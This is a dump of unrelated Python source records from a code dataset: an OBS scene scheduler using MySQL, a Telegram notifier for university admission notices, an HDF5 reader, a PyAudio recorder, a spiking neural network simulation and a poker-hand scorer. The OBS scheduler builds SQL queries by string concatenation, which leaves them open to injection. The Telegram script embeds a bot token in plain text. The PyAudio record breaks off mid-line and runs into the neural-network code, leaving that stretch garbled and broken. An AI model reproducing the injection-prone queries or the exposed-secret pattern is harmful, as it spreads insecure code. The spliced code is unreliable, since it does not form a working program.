parser.add_argument('--drop_rate', type=float, default=0.5)\r\n\r\n args = parser.parse_args()\r\n main(**vars(args))\r\n","sub_path":"Test and validation/test_average.py","file_name":"test_average.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"355522747","text":"# -*- coding: utf-8 -*-\n\nimport os\n\nimport h5py\n\nfrom tvb_scripts.io.h5_writer import H5Writer\nfrom tvb_scripts.utils.log_error_utils import initialize_logger\n\n\nclass H5ReaderBase(object):\n logger = initialize_logger(__name__)\n\n H5_TYPE_ATTRIBUTE = H5Writer().H5_TYPE_ATTRIBUTE\n H5_SUBTYPE_ATTRIBUTE = H5Writer().H5_SUBTYPE_ATTRIBUTE\n H5_TYPES_ATTRUBUTES = [H5_TYPE_ATTRIBUTE, H5_SUBTYPE_ATTRIBUTE]\n\n def _open_file(self, name, path=None, h5_file=None):\n if h5_file is None:\n if not os.path.isfile(path):\n raise ValueError(\"%s file %s does not exist\" % (name, path))\n\n self.logger.info(\"Starting to read %s from: %s\" % (name, path))\n h5_file = h5py.File(path, 'r', libver='latest')\n return h5_file\n\n def _close_file(self, h5_file, close_file=True):\n if close_file:\n h5_file.close()\n\n def _log_success(self, name, path=None):\n if path is not None:\n self.logger.info(\"Successfully read %s from: %s\" % (name, path))\n\n\nclass H5GroupHandlers(object):\n H5_SUBTYPE_ATTRIBUTE = H5Writer().H5_SUBTYPE_ATTRIBUTE\n\n def read_dictionary_from_group(self, group, type=None):\n dictionary = dict()\n for dataset in group.keys():\n dictionary.update({dataset: group[dataset][()]})\n for attr in group.attrs.keys():\n dictionary.update({attr: group.attrs[attr]})\n if type is None:\n type = group.attrs[self.H5_SUBTYPE_ATTRIBUTE]\n else:\n return dictionary\n","sub_path":"tvb_scripts/io/h5_reader_base.py","file_name":"h5_reader_base.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"284209490","text":"class Solution(object):\n def findClosestElements(self, arr, k, x):\n \"\"\"\n :type arr: List[int]\n :type k: int\n :type x: int\n :rtype: List[int]\n \"\"\"\n\n while len(arr) > k:\n start, end = 0, len(arr) - 1\n if x - arr[start] <= arr[end] - x:\n arr.pop()\n else:\n arr.pop(0)\n\n return arr\n\n","sub_path":"LPractice/658. Find K Closest Elements.py","file_name":"658. Find K Closest Elements.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"561655825","text":"#!/usr/bin/env python\n\nimport sys\nimport time\nimport logging\nfrom datetime import datetime\nfrom datetime import timedelta \nimport socket\nimport websocket #pip install websocket-client\nimport hashlib\nimport base64\nimport json\nimport mysql.connector #pip install mysql-connector-python\nfrom mysql.connector import Error\ntry:\n import thread\nexcept ImportError:\n import _thread as thread\n\n\n#MariaDB settings. 
Port = 3306 or 3307\nmysqlconfig = {\n 'user': 'user',\n 'password': 'pass',\n 'host': 'localhost',\n 'port': '3306',\n 'database': 'OBSdb',\n 'raise_on_warnings': True\n}\n\nwritelog = 0\n\nargs = sys.argv[1:]\nif len(args):\n\tCW = args[0]\n\tif CW == '-l':\n\t\twritelog = 1\n\t\tprint (\"Logfile will be made.\")\n\nif writelog:\n\tlogging.basicConfig(filename=time.strftime(\"%Y%m%d%H%M%S\") + '.log', level=logging.INFO)\n\tlogging.info('Started')\n \ntry:\n\tconnection = mysql.connector.connect(**mysqlconfig)\n\tif connection.is_connected():\n\t\tdb_Info = connection.get_server_info()\n\t\tprint(\"Connected to MySQL Server version \", db_Info)\n\t\tif writelog:\n\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": Connected to MySQL Server version \" + db_Info)\n\t\tmycursor = connection.cursor(dictionary=True)\n\t\tmycursor.execute(\"SELECT * FROM host\")\n\t\trecords = mycursor.fetchall()\n\t\tfor row in records:\n\t\t\thost = row[\"hostname\"]\n\t\t\tport = row[\"port\"]\n\t\t\tpassword = row[\"pass\"]\nexcept Error as e:\n\tprint(\"Error while connecting to MySQL\", e)\n\tif writelog:\n\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": Error while connecting to MySQL\" + e)\n\t\ntry:\n\tconnectionthread = mysql.connector.connect(**mysqlconfig)\n\tif connectionthread.is_connected():\n\t\tdb_Info = connectionthread.get_server_info()\n\t\tprint(\"Thread connected to MySQL Server version \", db_Info)\n\t\tif writelog:\n\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": Thread connected to MySQL Server version \" + db_Info)\nexcept Error as e:\n\tprint(\"Error while connecting to MySQL\", e)\n\tif writelog:\n\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": Error while connecting thread to MySQL\" + e)\n\n\nStudioMode = False\nobsconnected = False\nexporttime = [0,500,1000,1500,2000,2500,3000,3500,4000,4500,5000,5500]\n#exporttime = [0,1000,2000,3000,4000,5000] # every hour at mmss. 
100 = 1 minute after each hour, 1500 = 15 minutes after each hour.\n#[0,1000,2000,3000,4000,5000] = export every 10 minutes\nGetAuthRequired = {\"request-type\" : \"GetAuthRequired\" ,\"message-id\" : \"1\"};\nGetStudioModeStatus = {\"request-type\" : \"GetStudioModeStatus\" , \"message-id\" : \"GetStudioModeStatus\"}\nGetSceneList = {\"request-type\" : \"GetSceneList\" , \"message-id\" : \"getSceneList\"}\nGetSourcesList = {\"request-type\" : \"GetSourcesList\" , \"message-id\" : \"GetSourcesList\"}\nGetTransitionList = {\"request-type\": \"GetTransitionList\",\"message-id\" : \"GetTransitionList\"}\n\nwhile True:\n\ttry:\n\t\tdef on_message(ws, message):\n\t\t\tdata = json.loads(message)\n\t\t\t#print (data[\"message-id\"])\n\t\t\t#print (data)\n\t\t\tglobal obsconnected\n\t\t\tif \"error\" in data:\n\t\t\t\tif (data[\"error\"] == \"Authentication Failed.\"):\n\t\t\t\t\tprint(\"Authentication Failed.\")\n\t\t\t\t\tif writelog:\n\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": Authentication Failed.\")\n\t\t\t\t\tws.keep_running = False\n\t\t\t\telse:\n\t\t\t\t\tprint (data)\n\t\t\t\t\tmessage = str(data)\n\t\t\t\t\tif writelog:\n\t\t\t\t\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + message)\n\t\t\telif \"message-id\" in data:\n\t\t\t\tif (data[\"message-id\"] == \"GetStudioModeStatus\"):\n\t\t\t\t\tglobal StudioMode\n\t\t\t\t\tStudioMode = data[\"studio-mode\"]\n\t\t\t\telif (data[\"message-id\"] == \"getSceneList\"):\n\t\t\t\t\tif not connection.is_connected():\n\t\t\t\t\t\t\tconnection.reconnect(attempts=5, delay=0)\n\t\t\t\t\tmycursor = connection.cursor()\n\t\t\t\t\tmycursor.execute(\"TRUNCATE TABLE scenenames\")\n\t\t\t\t\tconnection.commit()\n\t\t\t\t\tmycursor = connection.cursor()\n\t\t\t\t\tmycursor.execute(\"TRUNCATE TABLE sourcenames\")\n\t\t\t\t\tconnection.commit()\n\t\t\t\t\tfor name in data['scenes']:\n\t\t\t\t\t\tscene = name['name']\n\t\t\t\t\t\tif not connection.is_connected():\n\t\t\t\t\t\t\tconnection.reconnect(attempts=5, delay=0)\n\t\t\t\t\t\tmycursor = connection.cursor()\n\t\t\t\t\t\tqry = \"INSERT INTO scenenames(scene) VALUES('\" + scene + \"')\"\n\t\t\t\t\t\tmycursor.execute(qry)\n\t\t\t\t\t\tconnection.commit()\n\t\t\t\t\t\tfor name in name['sources']:\n\t\t\t\t\t\t\tsourcename = name['name']\n\t\t\t\t\t\t\tmycursor = connection.cursor()\n\t\t\t\t\t\t\tqry = \"INSERT INTO sourcenames(scene,source) VALUES('\" + scene + \"' , '\" + sourcename + \"')\"\n\t\t\t\t\t\t\tif not connection.is_connected():\n\t\t\t\t\t\t\t\tconnection.reconnect(attempts=5, delay=0)\n\t\t\t\t\t\t\tmycursor.execute(qry)\n\t\t\t\t\t\t\tconnection.commit()\n\t\t\t\telif (data[\"message-id\"] == \"GetTransitionList\"):\n\t\t\t\t\tif not connection.is_connected():\n\t\t\t\t\t\t\tconnection.reconnect(attempts=5, delay=0)\n\t\t\t\t\tmycursor = connection.cursor()\n\t\t\t\t\tmycursor.execute(\"TRUNCATE TABLE transitionnames\")\n\t\t\t\t\tconnection.commit()\n\t\t\t\t\tfor i in data['transitions']:\n\t\t\t\t\t\ttrans_type = i['name']\n\t\t\t\t\t\tif not connection.is_connected():\n\t\t\t\t\t\t\tconnection.reconnect(attempts=5, delay=0)\n\t\t\t\t\t\tmycursor = connection.cursor()\n\t\t\t\t\t\tqry = \"INSERT INTO transitionnames(transition) VALUES('\" + trans_type + \"')\"\n\t\t\t\t\t\tmycursor.execute(qry)\n\t\t\t\t\t\tconnection.commit()\n\t\t\t\telif (data[\"message-id\"] == \"SetCurrentTransition\"):\n\t\t\t\t\tprint(\"SetCurrentTransition\")\n\t\t\t\t#elif (data[\"authRequired\"]):\n\t\t\t\telif (data[\"message-id\"] == \"1\"):\n\t\t\t\t\tprint(\"Authentication 
required\")\n\t\t\t\t\tsecret = base64.b64encode(hashlib.sha256((password + data['salt']).encode('utf-8')).digest())\n\t\t\t\t\tauth = base64.b64encode(hashlib.sha256(secret + data['challenge'].encode('utf-8')).digest()).decode('utf-8')\n\t\t\t\t\tauth_payload = {\"request-type\": \"Authenticate\", \"message-id\": \"2\", \"auth\": auth}\n\t\t\t\t\tws.send(json.dumps(auth_payload))\n\t\t\t\t\tobsconnected = True\n\t\t\t\telif (data[\"message-id\"] == \"2\"):\n\t\t\t\t\tprint(\"Login pass\")\n\t\t\t\telif (data[\"message-id\"] == \"SetCurrentScene\") or (data[\"message-id\"] == \"SetSceneItemProperties\") or (data[\"message-id\"] == \"SetPreviewScene\") :\n\t\t\t\t\tTrue\n\t\t\t\telse:\n\t\t\t\t\tprint(data)\n\t\t\t\t\tmessage = str(data)\n\t\t\t\t\tif writelog:\n\t\t\t\t\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + message)\n\t\t\t\t\tobsconnected = True\n\t\t\telif \"update-type\" in message:\n\t\t\t\tif (data[\"update-type\"] == \"StudioModeSwitched\"):\n\t\t\t\t\tStudioMode = data[\"new-state\"]\n\n\t\tdef on_error(ws, error):\n\t\t\tprint(error)\n\t\t\tif writelog:\n\t\t\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + str(error))\n\t\t\tws.close()\n\n\t\tdef on_close(ws):\n\t\t\tprint(\"On Close Connection error.\")\n\t\t\tif writelog:\n\t\t\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": On Close Connection error.\")\n\t\t\t#stop on_open while loop\n\t\t\tglobal obsconnected\n\t\t\tobsconnected = False\n\t\t\tws.keep_running = False\n\t\t\ttime.sleep(30)\n\n\t\tdef on_open(ws):\n\t\t\tdef run(*args):\n\t\t\t\tws.send(json.dumps(GetAuthRequired))\n\t\t\t\ttime.sleep(2)\n\t\t\t\tif ws.sock:\n\t\t\t\t\tws.send(json.dumps(GetStudioModeStatus))\n\t\t\t\t\tglobal obsconnected\n\t\t\t\t\tweekdays = (\"ma\",\"di\",\"wo\",\"do\",\"vr\",\"za\",\"zo\") #Dutch\n\t\t\t\t\twhile obsconnected == True:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tdayrun = False\n\t\t\t\t\t\t\tcurrentdtime = time.strftime(\"%Y%m%d%H%M%S\",time.localtime())\n\t\t\t\t\t\t\ttimenow = time.strftime(\"%H:%M:%S\",time.localtime())\n\t\t\t\t\t\t\tif not connectionthread.is_connected():\n\t\t\t\t\t\t\t\tconnectionthread.reconnect(attempts=5, delay=0)\n\t\t\t\t\t\t\tmycursor = connectionthread.cursor(dictionary=True)\n\t\t\t\t\t\t\tgetqry = \"SELECT * FROM schedules WHERE processed = 0\"\n\t\t\t\t\t\t\tmycursor.execute(getqry)\n\t\t\t\t\t\t\trecords = mycursor.fetchall()\n\t\t\t\t\t\t\tprint(time.strftime(\"%H:%M:%S\",time.localtime()))\n\t\t\t\t\t\t\tfor row in records:\n\t\t\t\t\t\t\t\tlogrow = str(row)\n\t\t\t\t\t\t\t\tid = row[\"id\"]\n\t\t\t\t\t\t\t\tswtime = row[\"swtime\"]\n\t\t\t\t\t\t\t\tswdate = row[\"swdate\"]\n\t\t\t\t\t\t\t\ttime_object = datetime.strptime(str(swtime), '%H:%M:%S').time()\n\t\t\t\t\t\t\t\tdate_object = datetime.strptime(str(swdate), '%Y-%m-%d').date()\n\t\t\t\t\t\t\t\tdatetime_str = datetime.combine(date_object , time_object)\n\t\t\t\t\t\t\t\tdtime = datetime_str.strftime(\"%Y%m%d%H%M%S\")\n\t\t\t\t\t\t\t\tscene = row[\"scene\"]\n\t\t\t\t\t\t\t\ttrans_type = row[\"transition\"]\n\t\t\t\t\t\t\t\tsourceoff = row[\"sourceoff\"] #source in this scene to switch off\n\t\t\t\t\t\t\t\tsourceon = row[\"sourceon\"] #source in this scene to switch on\n\t\t\t\t\t\t\t\trepeattime = row[\"repeattime\"]\n\t\t\t\t\t\t\t\tscenesourceoff = row[\"scenesourceoff\"]\n\t\t\t\t\t\t\t\tscenesourceon = row[\"scenesourceon\"]\n\t\t\t\t\t\t\t\tif timenow == datetime_str.strftime(\"%H:%M:%S\"):\n\t\t\t\t\t\t\t\t\tif weekdays[datetime.today().weekday()] in repeattime:\n\t\t\t\t\t\t\t\t\t\tdayrun = 
True\n\t\t\t\t\t\t\t\tif currentdtime == dtime or dayrun:\n\t\t\t\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + logrow)\n\t\t\t\t\t\t\t\t\tif len(sourceon) > 0:\n\t\t\t\t\t\t\t\t\t\t#first set correct scene in preview\n\t\t\t\t\t\t\t\t\t\tmessage = {\"request-type\" : \"SetPreviewScene\" , \"message-id\" : \"SetPreviewScene\" , \"scene-name\" : scenesourceon};\n\t\t\t\t\t\t\t\t\t\tlogmessage = str(message)\n\t\t\t\t\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + logmessage)\n\t\t\t\t\t\t\t\t\t\tws.send(json.dumps(message))\n\t\t\t\t\t\t\t\t\t\t#set source properties\n\t\t\t\t\t\t\t\t\t\tmessage={\"request-type\" : \"SetSceneItemProperties\" , \"message-id\" : \"SetSceneItemProperties\" , \"scene-name\" : scenesourceon , \"item\" : sourceon , \"visible\": True };\n\t\t\t\t\t\t\t\t\t\tlogmessage = str(message)\n\t\t\t\t\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + logmessage)\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\tws.send(json.dumps(message))\n\t\t\t\t\t\t\t\t\tif len(sourceoff) > 0:\n #delay,else to fast for OBS\n\t\t\t\t\t\t\t\t\t\ttime.sleep(2)\n\t\t\t\t\t\t\t\t\t\tmessage = {\"request-type\" : \"SetPreviewScene\" , \"message-id\" : \"SetPreviewScene\" , \"scene-name\" : scenesourceoff};\n\t\t\t\t\t\t\t\t\t\tlogmessage = str(message)\n\t\t\t\t\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + logmessage)\n\t\t\t\t\t\t\t\t\t\tws.send(json.dumps(message))\n\t\t\t\t\t\t\t\t\t\tmessage={\"request-type\" : \"SetSceneItemProperties\" , \"message-id\" : \"SetSceneItemProperties\" , \"scene-name\" : scenesourceoff , \"item\" : sourceoff , \"visible\": False };\n\t\t\t\t\t\t\t\t\t\tlogmessage = str(message)\n\t\t\t\t\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + logmessage)\n\t\t\t\t\t\t\t\t\t\tws.send(json.dumps(message))\n\t\t\t\t\t\t\t\t\tmessage={\"request-type\" : \"SetCurrentTransition\" , \"message-id\" : \"SetCurrentTransition\" ,\"transition-name\":trans_type};\n\t\t\t\t\t\t\t\t\tws.send(json.dumps(message))\n\t\t\t\t\t\t\t\t\tmessage = {\"request-type\" : \"SetCurrentScene\" , \"message-id\" : \"SetCurrentScene\" , \"scene-name\" : scene};\n\t\t\t\t\t\t\t\t\tws.send(json.dumps(message))\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tif not connectionthread.is_connected():\n\t\t\t\t\t\t\t\t\t\tconnectionthread.reconnect(attempts=5, delay=0)\n\t\t\t\t\t\t\t\t\tmycursor = connectionthread.cursor()\n\t\t\t\t\t\t\t\t\tif len(repeattime) > 0 and not dayrun:\n\t\t\t\t\t\t\t\t\t\tif \",\" in repeattime:\n\t\t\t\t\t\t\t\t\t\t\trepeattimenew = repeattime.split(',')[0]\n\t\t\t\t\t\t\t\t\t\t\trepeattimenumber = repeattime.split(',')[1]\n\t\t\t\t\t\t\t\t\t\t\tif repeattimenumber == \"0\": #continuous\n\t\t\t\t\t\t\t\t\t\t\t\tnewdtime = datetime_str + timedelta(minutes=int(repeattimenew))\n\t\t\t\t\t\t\t\t\t\t\t\tnew_time_object = datetime.time(newdtime)\n\t\t\t\t\t\t\t\t\t\t\t\tnew_date_object = datetime.date(newdtime)\n\t\t\t\t\t\t\t\t\t\t\t\tqry = \"UPDATE schedules SET swtime = '\" + new_time_object.strftime(\"%H:%M:%S\") + \"', swdate ='\" + new_date_object.strftime(\"%Y-%m-%d\") + \"' WHERE id = \" + str(id) + \";\"\n\t\t\t\t\t\t\t\t\t\t\telif repeattimenumber == \"1\": #last run was done\n\t\t\t\t\t\t\t\t\t\t\t\tqry = \"UPDATE schedules SET processed = 1 WHERE id = \" + str(id) + \";\"\n\t\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\t\tnewdtime = datetime_str + timedelta(minutes=int(repeattimenew))\n\t\t\t\t\t\t\t\t\t\t\t\trepeattime = repeattimenew + \",\" + str(int(repeattimenumber) - 
1)\n\t\t\t\t\t\t\t\t\t\t\t\tnew_time_object = datetime.time(newdtime)\n\t\t\t\t\t\t\t\t\t\t\t\tnew_date_object = datetime.date(newdtime)\n\t\t\t\t\t\t\t\t\t\t\t\tqry = \"UPDATE schedules SET swtime = '\" + new_time_object.strftime(\"%H:%M:%S\") + \"', swdate = '\" + new_date_object.strftime(\"%Y-%m-%d\") + \"', repeattime = '\" + repeattime + \"' WHERE id = \" + str(id) + \";\"\n\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\tnewdtime = datetime_str + timedelta(minutes=int(repeattime))\n\t\t\t\t\t\t\t\t\t\t\tnew_time_object = datetime.time(newdtime)\n\t\t\t\t\t\t\t\t\t\t\tnew_date_object = datetime.date(newdtime)\n\t\t\t\t\t\t\t\t\t\t\tqry = \"UPDATE schedules SET swtime = '\" + new_time_object.strftime(\"%H:%M:%S\") + \"', swdate ='\" + new_date_object.strftime(\"%Y-%m-%d\") + \"' WHERE id = \" + str(id) + \";\"\n\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\tqry = \"UPDATE schedules SET processed = 1 WHERE id = \" + str(id) + \";\"\n\t\t\t\t\t\t\t\t\tif not dayrun:\n\t\t\t\t\t\t\t\t\t\tmycursor.execute(qry)\n\t\t\t\t\t\t\t\t\t\tconnectionthread.commit()\n\t\t\t\t\t\t\t\t\tprint(\"Transition to: \" + scene + \" at \" + time.strftime(\"%H:%M:%S\",time.localtime()))\n\t\t\t\t\t\t\t\t\tif writelog:\n\t\t\t\t\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": Transition to: \" + scene + \" at \" + time.strftime(\"%H:%M:%S\",time.localtime()))\n\t\t\t\t\t\t\t\t\ttime.sleep(1) #wait for next second.\n\t\t\t\t\t\t\tconnectionthread.close()\n\t\t\t\t\t\t\ttime.sleep(0.25) #no need 100's loops a second\n\t\t\t\t\t\texcept Exception:\n\t\t\t\t\t\t\tprint(\"connectionthread error\")\n\t\t\t\t\t\t\tconnectionthread.close()\n\t\t\t\t\t\t\tif writelog:\n\t\t\t\t\t\t\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": connectionthread error\")\n\t\t\t\t\t\t\ttime.sleep(10)\n\t\t\t\t\t\ttimenow = int(time.strftime(\"%M%S\",time.localtime()))\n\t\t\t\t\t\tif timenow in exporttime:\n\t\t\t\t\t\t\tprint(\"export scenes\")\n\t\t\t\t\t\t\tws.send(json.dumps(GetSceneList))\n\t\t\t\t\t\t\tUpdatescenes = False\n\t\t\t\t\t\t\ttime.sleep(0.25)\n\t\t\t\t\t\tif timenow - 10 in exporttime:\n\t\t\t\t\t\t\tprint(\"export transitions\")\n\t\t\t\t\t\t\tws.send(json.dumps(GetTransitionList))\n\t\t\t\t\t\t\ttime.sleep(0.25)\n\t\t\tthread.start_new_thread(run, ())\n\n\t\tif __name__ == \"__main__\":\n\t\t\t#websocket.enableTrace(True)\n\t\t\tws = websocket.WebSocketApp(\"ws://{}:{}\".format(host, port),on_message = on_message,on_error = on_error,on_close = on_close)\n\t\t\tws.on_open = on_open\n\t\t\tws.run_forever()\n\n\texcept Exception:\n\t\tprint(\"Exception Connection error\")\n\t\tif writelog:\n\t\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": Exception Connection error\")\n\t\ttime.sleep(10)\n\n\n\n\n\n","sub_path":"obsschedulermySQL.py","file_name":"obsschedulermySQL.py","file_ext":"py","file_size_in_byte":13499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"10839188","text":"from bs4 import BeautifulSoup\nimport requests\nimport os\nimport telegram\n\nmy_token = '509374426:AAHLko_Iht5oulMOo8tBTAbd52vYyFL8GwU'\nbot = telegram.Bot(token=my_token)\nupdate = bot.get_updates()\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\nreq = requests.get('http://admission.cau.ac.kr/iphak/notice.htm?bbsid=notice&ctg_cd=entry')\nreq.encoding = 'euc-kr'\n\nhtml = req.text\nsoup = BeautifulSoup(html, 'html.parser')\nposts = soup.select('div.article > div > table > tbody > tr > td.al > a')\nsave = posts[-1].text\n\n# for i in posts:ㅇ\n# # 
print(i)\n# print(i.text)\n\nwith open(os.path.join(BASE_DIR, 'cau.txt'), 'r+') as f_read:\n before = f_read.readline()\n if before != save:\n bot.sendMessage(chat_id='384222529', text='중앙대 편입학 새공지가 있습니다.')\n bot.sendMessage(chat_id='384222529', text='http://admission.cau.ac.kr/iphak/notice.htm?bbsid=notice&ctg_cd=entry')\n\n with open(os.path.join(BASE_DIR, 'cau.txt'), 'w+') as f_write:\n f_write.write(save)\n f_write.close()\n\n f_read.close()\n","sub_path":"transfer_cau.py","file_name":"transfer_cau.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"623757362","text":"import wave\r\nfrom pyaudio import PyAudio,paInt16\r\n\r\n# 录制的音频质量参数\r\nframerate=16000\r\nNUM_SAMPLES=2000\r\nchannels=1\r\nsampwidth=2\r\nTIME=16 #单位为s,实际录音时间会缩小两倍\r\n\r\n# 录音函数\r\ndef save_wave_file(param, my_buf):\r\n pass\r\n\r\n\r\ndef start():\r\n pa=PyAudio()\r\n stream=pa.open(format = paInt16,channels=1,\r\n rate=framerate,input=True,\r\n frames_per_buffer=NUM_SAMPLES)\r\n my_buf=[]\r\n count=0\r\n while count= 0)\n x = x * (x <= 1)\n x = x + (1-x)/tau_x * dt\n x = x * (x >= 0)\n x = x * (x <= 1)\n\n J[:n_exc, :n_exc] = J_EE * x\n\n exc_input = np.dot(J[:, :n_exc], b_last_spike[:n_exc])\n inh_input = np.dot(J[:, n_exc:], b_last_spike[n_exc:])\n exc_input = exc_input + g_ext\n\n # update conductance\n g_inh = g_inh + (-g_inh / float(tau_gaba)) * dt + inh_input\n g_ampa = g_ampa + (-g_ampa / float(tau_ampa)) * dt + exc_input\n g_nmda = g_nmda + ((-g_nmda + g_ampa) / float(tau_nmda)) * dt\n g_exc = alpha * g_ampa + (1 - alpha) * g_nmda\n\n # seperate inhibitory and excitatory\n v[:n_exc] = v[:n_exc] + ((v_rest - v[:n_exc]) + g_exc[:n_exc] * (v_exc - v[:n_exc]) + g_inh[:n_exc] * (v_inh - v[:n_exc])) / float(tau_m_e) * dt\n v[n_exc:] = v[n_exc:] + ((v_rest - v[n_exc:]) + g_exc[n_exc:] * (v_exc - v[n_exc:]) + g_inh[n_exc:] * (v_inh - v[n_exc:])) / float(tau_m_i) * dt\n\n spike_info = (v > v_thr) & (t > t_allow_spike)\n spike_neuron_idx = np.where(spike_info)[0]\n spike_neuron_exc_idx = set(np.arange(0, n_exc, 1)).intersection(spike_neuron_idx)\n spike_neuron_inh_idx = set(np.arange(n_exc, n_exc+n_inh, 1)).intersection(spike_neuron_idx)\n pre_spike_time[spike_neuron_idx] = t\n t_allow_spike[spike_neuron_idx] = t + t_ref\n v[spike_neuron_idx] = v_spike_rest # reset membrane potential\n\n spike_mat[:, idx] = b_last_spike\n idx += 1\n if (i+1)%10000==0:\n fr_idx = int((i+1)/10000)-1\n plt.figure(figsize=(figure_len, figure_width))\n ax = plt.gca()\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['bottom'].set_visible(True)\n ax.spines['left'].set_visible(True)\n for axis in ['top', 'bottom', 'left', 'right']:\n ax.spines[axis].set_linewidth(line_width)\n plt.tick_params(width=line_width, length=tick_len)\n\n for i in range(n_exc+n_inh):\n spike_bins = np.where(spike_mat[i, :] != 0)[0]\n if i < n_exc:\n plt.plot(spike_bins, np.ones(len(spike_bins))*i, 'bo', markersize=5) # excitatory neurons\n else:\n plt.plot(spike_bins, np.ones(len(spike_bins))*i, 'ro', markersize=5)\n\n spike_mat_total[:, fr_idx*10000:(fr_idx+1)*10000] = spike_mat\n fr = np.sum(spike_mat, 1)\n firing_mat[:, fr_idx] = np.copy(fr)\n plt.xticks(np.arange(0, 10000 + 2000, 2000), [0, 0.2, 0.4, 0.6, 0.8, 1.0], fontsize=font_size_1, **hfont)\n plt.yticks(np.arange(0, 500+50, 100), fontsize=font_size_1, **hfont)\n plt.xlabel('Time (s)', fontsize=font_size_1, **hfont)\n plt.ylabel('Neurons', fontsize=font_size_1, **hfont)\n 
plt.xlim([0, 10000])\n plt.ylim([0, 500])\n plt.savefig('paper_figures/png/Fig_6S_Spiking_neural_networks_EE_STP_' + str(int(t)) + '.png')\n sio.savemat('data/spiking_neural_network/Fig_6S_Spiking_neural_networks_EE_STP_' + str(int(t)) + '.mat', mdict={'spike_mat': spike_mat})\n spike_mat = np.zeros((n_exc+n_inh, 10000))\n idx = 0\n\nplt.figure(figsize=(figure_len, figure_width))\nax = plt.gca()\nax.spines['top'].set_visible(False)\nax.spines['right'].set_visible(False)\nax.spines['bottom'].set_visible(True)\nax.spines['left'].set_visible(True)\nfor axis in ['top', 'bottom', 'left', 'right']:\n ax.spines[axis].set_linewidth(line_width)\nplt.tick_params(width=line_width, length=tick_len)\n\nfor i in range(n_exc + n_inh):\n spike_bins = np.where(spike_mat_total[i, :] != 0)[0]\n if i < n_exc:\n plt.plot(spike_bins, np.ones(len(spike_bins)) * i, 'bo', markersize=2) # excitatory neurons\n else:\n plt.plot(spike_bins, np.ones(len(spike_bins)) * i, 'ro', markersize=2)\n\nplt.xticks(np.arange(0, 60000 + 10000, 20000), [0, 2, 4, 6], fontsize=font_size_1, **hfont)\nplt.yticks(np.arange(0, 500 + 50, 100), fontsize=font_size_1, **hfont)\nplt.xlabel('Time (s)', fontsize=font_size_1, **hfont)\nplt.ylabel('Neurons', fontsize=font_size_1, **hfont)\nplt.xlim([0, 60000])\nplt.ylim([0, 500])\nplt.savefig('paper_figures/png/Fig_6S_Spiking_neural_networks_EE_STP_total.png')","sub_path":"src/Fig_6S_Spiking_neural_networks_2D_EE_STP.py","file_name":"Fig_6S_Spiking_neural_networks_2D_EE_STP.py","file_ext":"py","file_size_in_byte":7113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"49951532","text":"#!/usr/bin/env python\nimport time\nstart_time = time.time() \n\nf = open(\"poker.txt\").read()\n\nhands = [line.split(' ') for line in f.splitlines()]\n\n\n# Hand scores\n#---------------------------\n# 1 points: High card\n# 2 points: Pair\n# 3 points: Two pair\n# 4 points: Three of a kind\n# 5 points: Straight\n# 6 points: Flush\n# 7 points: Full House\n# ---------------------------- \n# None by inspection\n# ---------------------------- \n# 8 points: Four of a kind\n# 9 points: Straight flush\n# 10 points: Royal flush\n\n\ndef my_integer(string):\n\n face_cards = ['T', 'J', 'Q', 'K', 'A']\n try:\n return int(string)\n\n except:\n for i, card in enumerate(face_cards):\n if string == card:\n return i + 10\n\n\ndef score(hand):\n\n # Assume high card til u find something else\n score = 1\n\n if is_full_house(hand):\n score = 7\n\n elif is_flush(hand):\n score = 6\n\n elif is_straight(hand):\n score = 5\n\n elif is_three_of_a_kind(hand):\n score = 4\n\n elif is_two_pair(hand):\n score = 3\n\n elif is_one_pair(hand):\n score = 2\n\n return score\n\n\ndef compare_hands(hand1, hand2):\n\n score1 = score(hand1)\n score2 = score(hand2)\n\n if score1 == score2 and score1 == 1:\n values1 = [my_integer(card[0]) for card in hand1]\n values2 = [my_integer(card[0]) for card in hand2]\n\n return int(max(values1) > max(values2))\n\n elif score1 == score2 and score1 == 2:\n pair1 = is_one_pair(hand1)\n pair2 = 